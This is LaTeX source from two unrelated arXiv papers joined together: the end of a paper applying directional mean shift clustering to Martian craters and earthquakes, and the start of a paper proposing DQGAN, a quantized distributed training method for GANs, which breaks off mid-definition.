with $\bm{\mu}_{i,q} = \bm{e}_{i,q+1}\in \Omega_q \subset \mathbb{R}^{q+1}$ for $q=3,4,...,12$ and $i=1,...,4$, where the concentration parameter $\nu'=10$ and the mixture weight of each density component are constant. Here, $\left\{\bm{e}_{i,q+1}\right\}_{i=1}^{q+1} \subset \Omega_q$ is the standard basis of the ambient Euclidean space $\mathbb{R}^{q+1}$. For each value of dimension $q$, we repeat the data simulation process 20 times and compute the average misclassification rate of mode clustering with Algorithm~\ref{Algo:MS} on each simulated data set accordingly. Figure~\ref{fig:boxplot} shows the boxplots of misclassification rates.
\begin{figure}
\centering
\includegraphics[width=0.8\linewidth]{Figures/misrate_boxplot3_12.pdf}
\caption{Boxplots of misclassification rates of mode clustering under different values of dimension $q$}
\label{fig:boxplot}
\end{figure}
As the dimension $q$ of directional data becomes larger, the misclassification rates of mode clustering with Algorithm~\ref{Algo:MS} also gradually increase to 1 (the worst case), which in turn implies that the ability of Algorithm~\ref{Algo:MS} to identify the density component from which a data point is simulated tends to deteriorate with respect to the dimension. Such inferior performances of the directional mean shift algorithm on higher-dimensional hyperspheres are not surprising because (i) we do not fine-tune the bandwidth parameter (but simply apply the rule of thumb \eqref{bw_ROT}), and (ii) the algorithm is subject to the curse of dimensionality (see also Section~\ref{Sec:Com_Complexity}). However, since directional data in real-world applications mostly lie on a (hyper)sphere with dimension $q\leq 3$, Algorithm~\ref{Algo:MS} is effective in practice, as we will demonstrate in Section~\ref{Sec:real_world_app}.
\subsection{Real-World Applications}
\label{Sec:real_world_app}
We illustrate the practical relevance of the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) with two applications in astronomy and seismology.
\subsubsection{Craters on Mars}
The distribution and cluster configuration of craters on Mars shed light on the planetary subsurface structure (water or ice), relative surfaces ages, resurfacing history, and past geologic processes \citep{Lakes_On_Mars,BARLOW2015}. \cite{Unif_test_hypersphere2020} conducted three different statistical tests (Cramer-von Mises, Rothman, and Anderson-Darling-like tests) on Martian crater data to statistically validate the non-uniformity of the crater distribution on Mars. We apply the directional KDE \eqref{Dir_KDE} together with the directional mean shift algorithm to further estimate the density of craters and determine crater clusters on the surface of Mars. Martian crater data are publicly available on the Gazetteer of Planetary Nomenclature database (\url{https://planetarynames.wr.usgs.gov/AdvancedSearch}) of the International Astronomical Union (IUA). The positions of craters are recorded in areocentric coordinates (the planetocentric coordinates on Mars) so that the areocentric longitudes range from $0^{\circ}$ to $360^{\circ}$ and areocentric latitudes range from $-90^{\circ}$ to $90^{\circ}$. As craters with areocentric longitudes greater than $180^{\circ}$ are on the western hemisphere of Mars, we transform their longitudes back to the interval $(-180^{\circ},0^{\circ})$. (Note that $360^{\circ}$ in longitude corresponds to $0^{\circ}$ west/east after transformation.) In addition, we remove those small craters whose diameters are less than 5 kilometers from the crater data, as their presence may provide spurious information. After trimming, the data set contains 1653 craters. The bandwidth parameter is selected using \eqref{bw_ROT}, which becomes $h_{\text{ROT}} \approx 0.338$ for the trimmed data set. The estimated distribution of craters on Mars and clustering results are presented in Figure~\ref{fig:Mars_data}.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_MidStep_cyl.pdf}
\caption{Step 17}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_conv_cyl.pdf}
\caption{Step 178 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_MidStep_ortho.pdf}
\caption{Step 17}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_conv_ortho.pdf}
\caption{Step 178 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.8\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_MC_affi.pdf}
\caption{Mode clustering (Hammer projection view)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on Martian crater data.
The analysis is displayed in a similar way to Figure~\ref{fig:Two_d_ThreeM}. {\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
{\bf Panel (g):} Clustering result under the Hammer projection. }
\label{fig:Mars_data}
\end{figure}
As illustrated in Figure~\ref{fig:Mars_data}, the directional mean shift algorithm is capable of recovering the local modes of the estimated Martian crater density. Because we do not properly tune the bandwidth parameter, there is a spurious local mode around $(180^{\circ} W, 30^{\circ} S)$. Nevertheless, the mode clustering based on Algorithm~\ref{Algo:MS} succeeds in capturing two major crater clusters (or basins of attraction) on Mars, in which one cluster is densely cratered while the other is lightly catered. This finding aligns with prior research on the Martian crater distribution, stating that Mars can be divided into two general classes of terrain \citep{SODERBLOM1974239}. In Appendix~\ref{Appendix:Mars_Data},
we perform mode clustering with various smoothing bandwidths to illustrate multi-scale structures in the data.
\subsubsection{Earthquakes on Earth}
Earthquakes on Earth tend to occur more frequently in some regions than others. We again leverage the directional KDE \eqref{Dir_KDE} as well as the directional mean shift algorithm to analyze earthquakes with magnitudes of 2.5+ occurring between 2020-08-21 00:00:00 UTC and 2020-09-21 23:59:59 UTC around the world. The earthquake data can be obtained from the Earthquake Catalog (\url{https://earthquake.usgs.gov/earthquakes/search/}) of the United States Geological Survey. The data set contains 1666 earthquakes worldwide for this one-month period. We use the default bandwidth estimator \eqref{bw_ROT}, which yields $h_{\text{ROT}} \approx 0.245$ on the earthquake data set, and set the tolerance level to $\epsilon=10^{-7}$ throughout the analysis.
Figure~\ref{fig:Earthquake} displays the results.
There are seven local modes recovered by the directional mean shift algorithm, and they are located near (from left to right and top to bottom in Panel (g) of Figure~\ref{fig:Earthquake}) the Gulf of Alaska, the west side of the Rocky Mountain in Nevada, the Caribbean Sea, the west side of the Andes mountains in Chile, the Middle East, Indonesia, and Fiji. These regions are well-known active seismic areas along subduction zones, and our clustering of earthquake data elegantly partitions earthquakes into these regions without any prior knowledge from seismology.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_MidStep_cyl.pdf}
\caption{Step 10}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_conv_cyl.pdf}
\caption{Step 82 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_MidStep_ortho.pdf}
\caption{Step 10}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_conv_ortho.pdf}
\caption{Step 82 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.85\linewidth]{Figures/EQ_mode_graph.pdf}
\caption{Local modes and contour lines on the world map}
\end{subfigure}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.85\linewidth]{Figures/EQ_MS_affi.pdf}
\caption{Mode clustering on the world map}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on earthquake data for a one-month period.
The first two rows display the analysis similar to Figure~\ref{fig:Two_d_ThreeM}.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
{\bf Panel (g):} Contour plots of estimated density. {\bf Panel (h):} Clustering result using the directional mean shift algorithm.}
\label{fig:Earthquake}
\end{figure}
\section{Conclusion}
In this paper, we generalize the standard mean shift algorithm to directional data based on a total gradient (or differential) of the directional KDE and formulate it as a fixed-point iteration.
We derive the explicit forms of the (Riemannian) gradient and Hessian estimators from a general directional KDE and establish pointwise and uniform rates of convergence for the two derivative estimators. With these powerful uniform consistency results, we demonstrate that the collection of estimated local modes obtained by the directional mean shift algorithm is a statistically consistent estimator of the set of true local modes under some mild regularity conditions.
Additionally, the ascending property and convergence of the proposed algorithm are proved.
Finally, given a proper bandwidth parameter (or step size for other general gradient ascent algorithms on $\Omega_q$), we argue that the directional mean shift algorithm (or other general gradient ascent algorithms on $\Omega_q$) converge(s) linearly to the (estimated) local modes within their small neighborhoods regardless of whether a population-level or sample-based version of gradient ascent is applied.
Possible future extensions of our work are as follows.
\begin{itemize}
\item \textbf{Bandwidth Selection}. Current studies on bandwidth selectors for directional kernel smoothing settings primarily optimize the directional KDE itself. Research on bandwidth selection for derivatives of the directional KDE, especially gradient and Hessian estimators, has lagged behind. A well-designed bandwidth selector for the first-order derivatives of the directional KDE can further improve the algorithmic convergence rate of our algorithm in real-world applications. There are at least two common approaches to perform such bandwidth selection. The first is to calculate the explicit forms of dominating constants in the bias and stochastic variation terms when we derive pointwise convergence rates of the (Riemannian) gradient and Hessian estimators in Theorem~\ref{pw_conv_tang}. Then, under some assumptions on the underlying directional distribution, such as the von Mises Fisher distribution, a directional analogue to the rule of thumb of \cite{Silverman1986} for gradient and Hessian estimators can be explicated, although the calculations may be heavy. Another approach is to rely on data-adaptive methods, such as cross-validation \citep{KDE_Sphe1987} and bootstrap \citep{KDE_torus2011,Nonp_Dir_HDR2020}, which should be suitable for estimating the derivatives of the directional KDE. In addition, a bandwidth selector that is locally adaptive to the distribution of directional data is of great significance when the dimension is high.
\item \textbf{Accelerated Directional Mean Shift}. Another future direction is to accelerate the current directional mean shift algorithm when the sample size is large, as the number of iterations for convergence is over 150 in one of our real-world applications. There are several feasible approaches mentioned in Section~\ref{Sec:Intro} for the Euclidean mean shift algorithm. One of the most notable methods is the blurring procedure \citep{Fast_GBMS2006,GBMS2008}, in which the (Gaussian) mean shift algorithm is performed with a crucial modification that successively updates the data set for density estimation after each mean shift iteration. It has been demonstrated that the blurring procedure improves the convergence rate of the (Gaussian) mean shift algorithm to be cubic or even higher order with Gaussian clusters and an appropriate step size.
We present preliminary results of introducing blurring procedures into the directional mean shift algorithm with the von-Mises kernel in Appendix~\ref{Appendix:BMS}, where the blurring procedures are able to substantially reduce the total number of iterations. However, in addition to those valid estimated local modes identified by the original directional mean shift algorithm, the blurring version also recovers some spurious local mode estimates (see Table~\ref{table:BMS} in Appendix~\ref{Appendix:BMS} for additional details). Because the current stopping criterion applied in the blurring directional mean shift algorithm is adopted from the criterion for Gaussian blurring mean shift \citep{Fast_GBMS2006}, we plan to develop an improved stopping criterion for the blurring directional mean shift algorithm and investigate its rate of convergence.
\item \textbf{Connections to the EM Algorithm}. As pointed out by \cite{MS_EM2007}, the Gaussian mean shift algorithm for Euclidean data is an EM algorithm, while the mean shift algorithm with a non-Gaussian kernel is a generalized EM algorithm. It is unclear whether the directional mean shift algorithm with the von Mises kernel is also an EM algorithm on a mixture of von Mises-Fisher distributions on $\Omega_q$ \citep{spherical_EM} or even a generalized EM algorithm when other kernels are used in Algorithm~\ref{Algo:MS}. Bridging this connection can help establish the linear rate of convergence for the algorithm from a different angle.
\end{itemize}
\acks{We thank the anonymous reviewers and AE for their constructive comments that improved the quality of this paper. We also thank members in the Geometric Data Analysis Reading Group at the University of Washington for their helpful comments. YC is supported by NSF DMS - 1810960 and DMS - 1952781, NIH U01 - AG0169761.}
\newpage
| 2024-02-18T23:40:01.560Z | 2021-06-08T02:37:00.000Z | algebraic_stack_train_0000 | 1,118 | 17,758 |
|
proofpile-arXiv_065-5579 | \section{Introduction}
Generative adversarial networks (GANs) ~\cite{goodfellow2014generative}, a kind of deep generative model, are designed to approximate the probability distribution of a massive of data. It has been demonstrated powerful for various tasks including images generation~\cite{radford2016unsupervised}, video generation~\cite{vondrick2016generating}, and natural language processing~\cite{lin2017adversarial}, due to its ability to handle complex density functions. GANs are known to be notoriously difficult to train since they are non-convex non-concave min-max problems. Gradient descent-type algorithms are usually used for training generative adversarial networks, such as Adagrad~\cite{duchi2011adaptive}, Adadelta~\cite{zeiler2012adadelta}, RMSprop~\cite{tieleman2012lecture} and Adam~\cite{kingma2014adam}. However, it recently has been demonstrated that gradient descent type algorithms are mainly designed for minimization problems and may fail to converge when dealing with min-max problems~\cite{mertikopoulos2019optimistic}.
In addition, the learning rates of gradient type algorithms are hard to tune when they are applied to train GANs due to the absence of universal evaluation criteria like loss increasing or decreasing. Another critical problem for training GANs is that they usually contain a large number of parameters, thus may cost days or even weeks to train.
During the past years, much effort has been devoted for solving the above problems. Some recent works show that the Optimistic Mirror Descent (OMD) algorithm has superior performance for the min-max problems~\cite{mertikopoulos2019optimistic, daskalakis2018training, gidel2019a}, which introduces an extra-gradient step to overcome the the divergence issue of gradient descent-type algorithms for solving the min-max problems. Recently, Daskalakis et al.~\cite{daskalakis2018training} used OMD for training GAN in single machine. In addition, a few work also develop the distributed extragradient descent type algorithms to accelerate the training process of GANs \cite{jin2016scale, lian2017can, shen2018towards, tang2018d}. Recently, Liu et al.~\cite{liu2019decentralized} have proposed distributed extragradient methods to train GANs with the decentralized network topology, but their method suffers from the large amount of parameters exchange problem since they did not compress the transmitted gradients.
In this paper, we propose a novel distributed training method for GANs, named as the
{Distributed Quantized Generative Adversarial Networks (DQGAN)}. The new method is able to accelerate the training process of GAN in distributed environment and a quantization technique is used to reduce the communication cost. To the best of our knowledge, this is the first distributed training method for GANs with quantization. The main contributions of this paper are summarized as three-fold:
\begin{itemize}
\item We have proposed a {distributed optimization algorithm for training GANs}. Our main novelty is that the gradient of communication is quantified, so that our algorithm has a smaller communication overhead to further improve the training speed. Through the error compensation operation we designed, we can solve the convergence problem caused by the quantization gradient.
\item We have proved that the new method converges to first-order stationary point with non-asymptotic convergence under some common assumptions. The results of our analysis indicate that our proposed method can achieves a linear speedup in parameter server model.
\item We have conducted experiments to demonstrate the effectiveness and efficiency of our proposed method on both synthesized and real datasets. The experimental results verify the convergence of the new method and show that our method is able to improve the speedup of distributed training with comparable performance with the state-of-the-art methods.
\end{itemize}
The rest of the paper is organized as follows. Related works and preliminaries are summarized in Section~\ref{sec:notation_pre}. The detailed {DQGAN} and its convergence rate are described in Section~\ref{sec:method}. The experimental results on both synthetic and real datasets are presented in Section~\ref{sec:experiments}. Conclusions are given in Section~\ref{sec:conclusions}.
\section{Notations and Related Work}
\label{sec:notation_pre}
In this section, we summarize the notations and definitions used
in this paper, and give a brief review of related work.
\subsection{Generative Adversarial Networks}
\label{GANS}
Generative adversarial networks (GANs) consists of two components, one of which is a discriminator ($D$) distinguishing between real data and generated data while the other one is a generator ($G$) generating data to fool the discriminator. We define $p_{r}$ as the real data distribution and $p_{n}$ as the noise probability distribution of the generator $G$. The objective of a GAN is to make the generation data distribution of generator approximates the real data distribution $p_{r}$, which is formulated as a joint loss function for $D$ and $G$~\cite{goodfellow2014generative}
\begin{equation}
\label{minmax_gan}
\min_{\theta\in\Theta} \max_{\phi\in\Phi} \mathcal{L} \left( \theta, \phi \right),
\end{equation}
where $\mathcal{L} \left( \theta, \phi \right)$ is defined as follows
\begin{equation}
\label{loss_gan}
\begin{aligned}
\mathcal{L} \left( \theta, \phi \right) \overset{\text{def}}{=}
\mathbb{E}_{\mathbf{x} \sim p_r} \left[\log D_{\phi}\left(\mathbf{x}\right) \right]
+ \mathbb{E}_{\mathbf{z} \sim p_g} \left[ \log \left( 1-D_{\phi} ( G_{\theta}(\mathbf{z}) ) \right) \right] .
\end{aligned}
\end{equation}
$D_{\phi}(\mathbf{x})$ indicate that the discriminator which outputs a probability of its input being a real sample. $\theta$ is the parameters of generator $G$ and $\phi$ is the parameters of discriminator $D$.
However, (\ref{minmax_gan}) may suffer from saturating problem at the early learning stage and leads to vanishing gradients for the generator and inability to train in a stable manner~\cite{goodfellow2014generative,arjovsky2017wasserstein}. Then we used the loss in WGAN~\cite{goodfellow2014generative,arjovsky2017wasserstein}
\begin{equation}
\label{loss_gan1}
\begin{aligned}
\mathcal{L} \left( \theta, \phi \right) \overset{\text{def}}{=}
& \mathbb{E}_{\mathbf{x} \sim p_r} \left[D_{\phi}\left(\mathbf{x}\right)\right] - \mathbb{E}_{\mathbf{z} \sim p_g} \left[ D_{\phi} ( G_{\theta}(\mathbf{z}) ) \right].
\end{aligned}
\end{equation}
Then training GAN turns into finding the following Nash equilibrium
\begin{equation}
\label{G3}
\theta^{*} \in \mathop{\arg\min}_{\theta\in\Theta} \mathcal{L}_G \left( \theta, \phi^{*} \right),
\end{equation}
\begin{equation}
\label{D3}
\phi^{*} \in \mathop{\arg\min}_{\phi\in\Phi} \mathcal{L}_D \left( \theta^{*}, \phi \right),
\end{equation}
where
\begin{equation}
\label{nonzerosumG}
\mathcal{L}_G \left( \theta, \phi \right) \overset{\text{def}}{=}
-\mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ D_{\phi} (G_{\theta}(\mathbf{z}) ) \right],
\end{equation}
\begin{equation}
\label{nonzerosumD}
\begin{aligned}
\mathcal{L}_D \left( \theta, \phi \right) \overset{\text{def}}{=}
- \mathbb{E}_{\mathbf{x} \sim p_{r}} \left[ D_{\phi}\left(\mathbf{x}\right) \right] + \mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ D_{\phi} (G_{\theta}(\mathbf{z}) \right].
\end{aligned}
\end{equation}
Gidel et al.~\cite{gidel2019a} defines a \emph{stationary point} as a couple $(\theta^{*},\phi^{*})$ such that the directional derivatives of both
$\mathcal{L}_G \left( \theta, \phi^{*} \right)$ and $\mathcal{L}_D \left( \theta^{*}, \phi \right)$ are non-negative, i.e.,
\begin{equation}
\label{G5}
\nabla_{\theta} \mathcal{L}_G \left( \theta^{*}, \phi^{*} \right)^{T} \left( \theta-\theta^{*} \right) \geq 0,~\forall(\theta,\phi)\in\Theta\times\Phi;
\end{equation}
\begin{equation}
\label{D5}
\nabla_{\phi} \mathcal{L}_D \left( \theta^{*}, \phi^{*} \right)^{T} \left( \phi-\phi^{*} \right) \geq 0,~\forall(\theta,\phi)\in\Theta\times\Phi,
\end{equation}
which can be compactly formulated as
\begin{equation}
\label{VI}
\begin{aligned}
F \left( \mathbf{w}^{*} \right)^{T} & \left( \mathbf{w} - \mathbf{w}^{*} \right) \geq 0, ~ \forall \mathbf{w} \in \Omega,
\end{aligned}
\end{equation}
where $\mathbf{w} \overset{\text{def}}{=} \left[\theta,~\phi\right]^{T}$, $\mathbf{w}^{*} \overset{\text{def}}{=} \left[\theta^{*},~\phi^{*}\right]^{T}$, $\Omega\overset{\text{def}}{=}\Theta\times\Phi$ and $ F \left( \mathbf{w} \right) \overset{\text{def}}{=} \left[ \nabla_{\theta} \mathcal{L}_G \left( \theta, \phi \right),~\nabla_{\phi} \mathcal{L}_D \left( \theta, \phi \right) \right]^{T}$.
Many works have been done for GAN. For example, some focus on the loss design, such as WGAN~\cite{arjovsky2017wasserstein}, SN-GAN~\cite{miyato2018spectral}, LS-GAN~\cite{qi2019loss}; while the others focus on the network architecture design, such as CGAN~\cite{mirza2014conditional}, DCGAN~\cite{radford2016unsupervised}, SAGAN~\cite{zhang2018self}. However, only a few works focus on the distributed training of GAN~\cite{liu2019decentralized}, which is our focus.
\subsection{Optimistic Mirror Descent}
\label{OMD}
The update scheme of the basic gradient method is given by
\begin{equation}
\label{gradient}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_t) \right],
\end{equation}
where $F(\mathbf{w}_t)$ is the gradient at $\mathbf{w}_t$, $P_{w} \left[\cdot\right]$ is the projection onto the constraint set $w$ (if constraints are present) and $\eta_t$ is the step-size. The gradient descent algorithm is mainly designed for minimization problems and it was proved to be able to converge linearly under the strong monotonicity assumption on the operator $F(\mathbf{w}_t)$~\cite{chen1997Convergence}. However, the basic gradient descent algorithm may produce a sequence that drifts away and cycles without converging when dealing with some special min-max problems~\cite{arjovsky2017wasserstein}, such as bi-linear objective in~\cite{mertikopoulos2019optimistic}.
To solve the above problem, a practical approach is to compute the average of multiple iterates, which converges with a $O(\frac{1}{\sqrt{t}})$ rate~\cite{nedic2009subgradient}. Recently, the \emph{extragradient} method~\cite{nesterov2007dual} has been used for the min-max problems, due to its superior convergence rate of $O(\frac{1}{t})$. The idea of the \emph{extragradient} can be traced back to Korpelevich~\cite{korpelevich1976extragradient} and Nemirovski~\cite{nemirovski2004prox}. The basic idea of the extragradient is to compute a lookahead gradient to guide the following step. The iterates of the extragradient are given by
\begin{equation}
\label{extragradient_11}
\mathbf{w}_{t+\frac{1}{2}} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_t) \right],
\end{equation}
\begin{equation}
\label{extragradient_12}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right].
\end{equation}
However, we need to compute the gradient at both $\mathbf{w}_t$ and $\mathbf{w}_{t+\frac{1}{2}}$ in the above iterates. Chiang et al.~\cite{chiang2012online} suggested to use the following iterates
\begin{equation}
\label{extragradient_21}
\mathbf{w}_{t+\frac{1}{2}} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}) \right],
\end{equation}
\begin{equation}
\label{extragradient_22}
\mathbf{w}_{t+1} = P_{w} \left[ \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right],
\end{equation}
in which we only need to the compute the gradient at $\mathbf{w}_{t+\frac{1}{2}}$ and reuse the gradient $F(\mathbf{w}_{t-\frac{1}{2}})$ computed in the last iteration.
Considering the unconstrained problem without projection, (\ref{extragradient_21}) and (\ref{extragradient_22}) reduce to
\begin{equation}
\label{extragradient_31}
\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}),
\end{equation}
\begin{equation}
\label{extragradient_32}
\mathbf{w}_{t+1} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}),
\end{equation}
and it is easy to see that this update is equivalent to the following one line update as in ~\cite{daskalakis2018training}
\begin{equation}
\label{omd}
\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_{t-\frac{1}{2}} - 2\eta_t F(\mathbf{w}_{t-\frac{1}{2}})+\eta_t F(\mathbf{w}_{t-\frac{3}{2}}).
\end{equation}
The optimistic mirror descent algorithm is shown Algorithm~\ref{alg:OMD1}. To compute $\mathbf{w}_{t+1}$, it first generates an intermediate state $\mathbf{w}_{t+\frac{1}{2}}$ according to $\mathbf{w}_t$ and the gradient $F(\mathbf{w}_{t-\frac{1}{2}})$ computed in the last iteration, and then computes $\mathbf{w}_{t+1}$ according to both $\mathbf{w}_t$ and the gradient at $\mathbf{w}_{t+\frac{1}{2}}$. In the end of the iteration, $F(\mathbf{w}_{t+\frac{1}{2}})$ is stored for the next iteration. The optimistic mirror descent algorithm was used for online convex optimization~\cite{chiang2012online} and by Rakhlin and general online learning~\cite{rakhlin2013optimization}. Mertikopoulos et al.~\cite{mertikopoulos2019optimistic} used the optimistic mirror descent algorithm for training generative adversarial networks in single machine.
\begin{algorithm}[!h]
\caption{Optimistic Mirror Descent Algorithm}
\label{alg:OMD1}
\begin{algorithmic}[1]
\REQUIRE {step-size sequence $\eta_t>0$}
\FOR {$t = 0, 1, \ldots, T-1$}
\STATE {retrieve $F\left(\mathbf{w}_{t-\frac{1}{2}}\right)$}
\STATE {set $\mathbf{w}_{t+\frac{1}{2}} = \mathbf{w}_t - \eta_t F(\mathbf{w}_{t-\frac{1}{2}}) $}
\STATE {compute gradient $F\left(\mathbf{w}_{t+\frac{1}{2}}\right)$ at $\mathbf{w}_{t+\frac{1}{2}}$}
\STATE {set $\mathbf{w}_{t+1} = P_{w} \left[\mathbf{w}_t - \eta_t F(\mathbf{w}_{t+\frac{1}{2}}) \right]$}
\STATE {store $F\left(\mathbf{w}_{t+\frac{1}{2}}\right)$}
\ENDFOR
\STATE {Return $\mathbf{w}_{T}$}
\end{algorithmic}
\end{algorithm}
However, all of these works focus on the single machine
setting and we will propose a training algorithm for distributed settings.
\subsection{Distributed Training}
Distributed centralized network and distributed decentralized network are two kinds of topologies used in distributed training.
In distributed centralized network topology, each worker node can obtain information of all other worker nodes. Centralized training systems have different implementations. There exist two common models in the distributed centralized network topology, i.e., the parameter server model~\cite{li2014communication} and the AllReduce model~\cite{rabenseifner2004optimization, wang2019blink}. The difference between the parameter server model and the AllReduce model is that each worker in the AllReduce model directly sends the gradient information to other workers without a server.
In the distributed decentralized network topology, the structure of computing nodes are usually organized into a graph to process and the network topology does not ensure that each worker node can obtain information of all other worker nodes. All worker nodes can only communicate with their neighbors. In this case, the network topology connection can be fixed or dynamically uncertain. Some parallel algorithms are designed for fixed topology~\cite{jin2016scale, lian2017can, shen2018towards, tang2018d}. On the other hand, the network topology may change when the network accident or power accident causes the connection to be interrupted. Some method have been proposed for this kind of dynamic network topology~\cite{nedic2014distributed, nedic2017achieving}.
Recently, Liu et al.~\cite{liu2019decentralized} proposed to train GAN with the decentralized network topology, but their method suffers from the large amount of parameters exchange problem since they did not compress the transmitted gradients. In this paper, we mainly focus on distributed training of GAN with the distributed centralized network topology.
\begin{figure}[!t]
\centering
\includegraphics[width=\columnwidth]{distplot.pdf}
\caption{Distributed training of GAN in Algorithm~\ref{alg:DQOSG} in parameter-server model.}
\label{fig:framework}
\end{figure}
\subsection{Quantization}
Quantization is a promising technique to reduce the neural network model size by reducing the number of bits of the parameters. Early studies on quantization focus on CNNs and RNNs. For example, Courbariaux et al.~\cite{courbariaux2016binarized} proposed to use a single sign function with a scaling factor to binarize the weights and activations in the neural networks, Rastegari et al.~\cite{rastegari2016xnornet} formulated the quantization as an optimization problem in order to quantize CNNs to a binary neural network, Zhou et al.~\cite{zhou2016dorefanet} proposed to quantize the weights, activations and gradients. In the distributed training, the expensive communication cost can be reduced by quantizing the transmitted gradients.
Denote the quantization function as $Q(\mathbf{v})$ where $\mathbf{v}\in\mathbb{R}^{d}$.
Generally speaking, existing gradient quantization techniques in distributed training can be divided into two categories, i.e., \textbf{biased quantization} ($\mathbb{E}[Q(\mathbf{v})]\neq \mathbf{v}$~for~$\forall\mathbf{v}$) and \textbf{unbiased quantization} ($\mathbb{E}[Q(\mathbf{v})]= \mathbf{v}$ for any $\mathbf{v}$).
\textbf{Biased gradient quantization}: The sign function is a commonly-used biased quantization method~\cite{bernstein2018signsgd,seide20141,strom2015scalable}. Stich et al.~\cite{stich2018sparsified} proposed a top-k quantization method which only retains the top $k$ largest elements of this vector and set the others to zero.
\textbf{Unbiased gradient quantization}: Such methods usually use stochastically quantized gradients~\cite{wen2017terngrad,alistarh2017qsgd,wangni2018gradient}. For example, Alistarh et al.~\cite{alistarh2017qsgd} proposed a compression operator which can be formulated as
\begin{equation}
\label{qsgd}
Q(v_i) = sign(v_i) \cdot \|\mathbf{v}\|_{2} \cdot \xi_i(\mathbf{v},s),
\end{equation}
where $\xi_i(\mathbf{v},s)$ is defined as follows
\begin{equation}
\xi_i(\mathbf{v},s)=
\left\{
\begin{aligned}
&\frac{l}{s} &\text{with prob.} ~ 1-\left(\frac{|v_i|}{\|\mathbf{v}\|_2}\cdot s - l\right); \\
&\frac{l+1}{s} &\text{otherwise}.
\end{aligned},
\right.
\end{equation}
where $s$ is the number of quantization levels, $0 \leq l < s$ is a integer such that $|v_i|/\|\mathbf{v}\|_{2}\in[l/s,(l+1)/s]$. Hou et al.~\cite{hou2018analysis} replaced the $\|\mathbf{v}\|_{2}$ in the above method with $\|\mathbf{v}\|_{\infty}$.
\section{The Proposed Method}
\label{sec:method}
\subsection{{DQGAN} Algorithm}
Actually, we consider extensions of the algorithm to the context of a \emph{stochastic} operator, i.e., we no longer have access to the exact gradient but to an unbiased stochastic estimate of it.
Suppose we have $M$ machines.
When in machine $m$ at $t$-th iteration, we sample a mini-batch according to $\xi_{t}^{(m)} = \left( \xi_{t,1}^{(m)}, \xi_{t,2}^{(m)}, \cdots, \xi_{t,B}^{(m)} \right)$, where $B$ is the minibatch size.
In all $M$ machines, we use the same mini-batch size $B$.
We use the term $F(\mathbf{w}_{t}^{(m)};\xi_{t,b}^{(m)})$ ~ ($1\leq b \leq B$) and $F(\mathbf{w}_{t}^{(m)})$ to stand for \emph{stochastic gradient} and \emph{gradient} respectively.
When in machine $m$ at $t$-th iteration, we define \emph{mini-batch gradient} as $F(\mathbf{w}_{t}^{(m)};\xi_{t}^{(m)}) = \frac{1}{B} \sum_{b=1}^{B} F(\mathbf{w}_{t}^{(m)};\xi_{t,b}^{(m)})$.
To reduce the size of the transmitted gradients in distributed training, we introduce a quantization function $Q(\cdot)$ to compress the gradients. In this paper, we consider a general $\delta$-approximate compressor for our method
\begin{defn}
An quantization operator $Q$ is said to be $\delta$-approximate compressor for $\delta \in (0,1])$ if
\begin{equation}
